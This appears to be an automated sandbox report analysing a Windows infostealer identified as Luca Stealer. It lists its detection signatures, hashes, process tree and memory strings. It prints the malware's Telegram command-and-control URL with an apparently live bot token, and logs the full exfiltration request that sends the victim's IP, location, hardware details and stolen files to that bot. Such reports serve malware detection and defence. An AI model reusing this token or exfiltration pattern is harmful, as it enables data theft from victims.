Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
Analysis ID:822206
MD5:cd12cb026f70700b6d7d3122360c52e8
SHA1:b944514f2b56e27a9b5e26316f72fd9fec8aa94c
SHA256:70805738871f24f390c7b1e62e6b48bc4850399992d8b62bba3160550a0a3655
Tags:exeRustyStealer
Infos:

Detection

Luca Stealer
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe (PID: 6044 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe MD5: CD12CB026F70700B6D7D3122360C52E8)
    • powershell.exe (PID: 1304 cmdline: powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Luca Stealer

{"C2 url": "https://api.telegram.org/bot5749635914:AAHO1FmA3UVCNqptBOADqQF-cFGUoMOYe6g"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.271121352.000001C7F3912000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
      00000000.00000003.271472602.000001C7F3912000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
        00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
          00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
            Process Memory Space: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe PID: 6044JoeSecurity_LucaStealerYara detected Luca StealerJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe.7ff768b70000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
                0.2.SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe.7ff768b70000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeReversingLabs: Detection: 23%
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeVirustotal: Detection: 16%Perma Link
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeMalware Configuration Extractor: Luca Stealer {"C2 url": "https://api.telegram.org/bot5749635914:AAHO1FmA3UVCNqptBOADqQF-cFGUoMOYe6g"}
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C7C0A0 BCryptGenRandom,0_2_00007FF768C7C0A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B8E216 CryptUnprotectData,GetLastError,0_2_00007FF768B8E216
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C75B40 BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,BCryptGenRandom,SetLastError,GetFullPathNameW,GetLastError,GetLastError,memcmp,HeapFree,HeapFree,GetLastError,memcpy,HeapFree,0_2_00007FF768C75B40
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BFB06A BCryptGenRandom,BCryptGenRandom,0_2_00007FF768BFB06A
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BAF15D BCryptGenRandom,BCryptGenRandom,HeapFree,0_2_00007FF768BAF15D
                  Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.3:49696 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49699 version: TLS 1.2
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C67140 memset,FindFirstFileW,FindClose,CloseHandle,HeapFree,HeapFree,HeapFree,0_2_00007FF768C67140

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://api.telegram.org/bot5749635914:AAHO1FmA3UVCNqptBOADqQF-cFGUoMOYe6g
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1accept: */*host: ipwho.is
                  Source: global trafficHTTP traffic detected: GET /bot5749635914:AAHO1FmA3UVCNqptBOADqQF-cFGUoMOYe6g/sendDocument?chat_id=5493937924&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20102.129.143.39%0ACountry:%20Switzerland%0ACity:%20H%C3%BCnenberg%0APostal:%206331%0AISP:%20Datacamp%20Limited%20-%20A212238%0ATimezone:%20+01:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%207LYK_YVW%20(1280,%201024)%0AHWID:%207277006835843898%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%201%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2024%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=8e592a10a4a7a8a7-ddc2ad71fc5343ff-7197ea3cc88c5fb3-22b6fba439d0139bcontent-length: 1148236accept: */*host: api.telegram.org
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.271472602.000001C7F38B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.271754980.000001C7F38B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: centbrowser_default_webdata.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeString found in binary or memory: https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTML
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.271472602.000001C7F3912000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.271590858.000001C7F3923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5749635914:AAHO1FmA3UVCNqptBOADqQF-cFGUoMOYe6g/sendDocument?chat_id=5493
                  Source: centbrowser_default_webdata.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.271754980.000001C7F38F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.271121352.000001C7F38F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/ch.svg
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportCalling
                  Source: centbrowser_default_webdata.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: centbrowser_default_webdata.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.257288164.000001C7F526C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.254238568.000001C7F524E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255053673.000001C7F525E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255427189.000001C7F526B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000003.255231964.000001C7F5263000.00000004.00000020.00020000.00000000.sdmp, coowoo_default_webdata.0.dr, liebao_default_webdata.0.dr, google_default_webdata.0.dr, kometa_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, ucozmedia_default_webdata.0.dr, mail.ru_default_webdata.0.dr, orbitum_default_webdata.0.dr, torch_default_webdata.0.dr, comodo_default_webdata.0.dr, opera stable_default_webdata.0.dr, browser_default_webdata.0.dr, microsoft_default_webdata.0.dr, vivaldi_default_webdata.0.dr, citrio_default_webdata.0.dr, coccoc_default_webdata.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownDNS traffic detected: queries for: ipwho.is
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1accept: */*host: ipwho.is
                  Source: global trafficHTTP traffic detected: GET /bot5749635914:AAHO1FmA3UVCNqptBOADqQF-cFGUoMOYe6g/sendDocument?chat_id=5493937924&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20102.129.143.39%0ACountry:%20Switzerland%0ACity:%20H%C3%BCnenberg%0APostal:%206331%0AISP:%20Datacamp%20Limited%20-%20A212238%0ATimezone:%20+01:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%207LYK_YVW%20(1280,%201024)%0AHWID:%207277006835843898%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%201%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2024%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=8e592a10a4a7a8a7-ddc2ad71fc5343ff-7197ea3cc88c5fb3-22b6fba439d0139bcontent-length: 1148236accept: */*host: api.telegram.org
                  Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.3:49696 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49699 version: TLS 1.2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA4D11 memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,EnumDisplayMonitors,memcpy,HeapFree,CreateDCW,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,DeleteDC,memset,EnumDisplaySettingsExW,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,EnumDisplayMonitors,memcpy,HeapFree,HeapFree,HeapFree,CreateDCW,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,StretchBlt,GetDIBits,GetObjectW,memcpy,DeleteDC,DeleteDC,DeleteDC,DeleteObject,memcpy,memcpy,memcpy,memcpy,HeapFree,memcpy,HeapFree,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,HeapFree,RtlDeleteBoundaryDescriptor,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,HeapFree,GetSystemTimeAsFileTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,memset,GetTimeZoneInformation,memcpy,memcpy,memcpy,HeapFree,memcpy,memcpy,HeapFree,HeapFree,HeapFree,CloseHandle,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,HeapFree,HeapFree,memcpy,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,CloseHandle,RtlDeleteBoundaryDescriptor,HeapFree,HeapFree,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,HeapFree,HeapFree,CloseHandle,CloseHandle,SleepEx,0_2_00007FF768BA4D11
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B7691C0_2_00007FF768B7691C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C809230_2_00007FF768C80923
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B9EAE50_2_00007FF768B9EAE5
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C47A980_2_00007FF768C47A98
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768DBEAB30_2_00007FF768DBEAB3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C40BE40_2_00007FF768C40BE4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C80B730_2_00007FF768C80B73
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B82CD80_2_00007FF768B82CD8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA4D110_2_00007FF768BA4D11
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C42C9A0_2_00007FF768C42C9A
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C99DF80_2_00007FF768C99DF8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA0E0B0_2_00007FF768BA0E0B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BCFD610_2_00007FF768BCFD61
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA1FC30_2_00007FF768BA1FC3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B820990_2_00007FF768B82099
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C6C0900_2_00007FF768C6C090
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B741DD0_2_00007FF768B741DD
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B711730_2_00007FF768B71173
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B902EB0_2_00007FF768B902EB
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C8323C0_2_00007FF768C8323C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C363F00_2_00007FF768C363F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C643D00_2_00007FF768C643D0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B834B80_2_00007FF768B834B8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C7E54E0_2_00007FF768C7E54E
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B9E54E0_2_00007FF768B9E54E
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C866550_2_00007FF768C86655
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C997A20_2_00007FF768C997A2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B947880_2_00007FF768B94788
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B978E40_2_00007FF768B978E4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C7F90A0_2_00007FF768C7F90A
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BCC8B20_2_00007FF768BCC8B2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B9A8A80_2_00007FF768B9A8A8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF48BE0_2_00007FF768BF48BE
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B818530_2_00007FF768B81853
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BC19E00_2_00007FF768BC19E0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BEA9A90_2_00007FF768BEA9A9
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B7E9D60_2_00007FF768B7E9D6
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B8F97F0_2_00007FF768B8F97F
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BB99800_2_00007FF768BB9980
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C2E9800_2_00007FF768C2E980
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA29170_2_00007FF768BA2917
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C709300_2_00007FF768C70930
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C8093B0_2_00007FF768C8093B
